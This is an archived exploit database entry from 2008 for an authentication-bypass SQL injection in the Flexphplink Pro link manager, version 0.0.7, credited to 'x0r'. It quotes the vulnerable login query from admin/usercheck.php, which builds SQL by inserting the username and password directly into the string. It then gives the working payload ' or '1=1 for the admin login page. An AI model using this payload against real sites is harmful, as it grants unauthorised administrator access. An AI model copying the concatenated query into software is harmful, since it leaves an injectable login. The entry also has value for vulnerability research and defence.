Flexphplink 0.0.x - Auth Bypass SQL Injection Vulnerability

2008-12-29T00:00:00
ID EDB-ID:7616
Type exploitdb
Reporter x0r
Modified 2008-12-29T00:00:00

Description

Flexphplink 0.0.x (Auth Bypass) SQL Injection Vulnerability. CVE-2008-6730. Webapps exploit for php platform

                                        
                                            #############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphplink Pro
Version: 0.0.7
Download: http://www.china-on-site.com/flexphplink/downloads.html
##############################################

Bug In \admin\usercheck.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";

Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Greetz: Visit My Site Pls :P

# milw0rm.com [2008-12-29]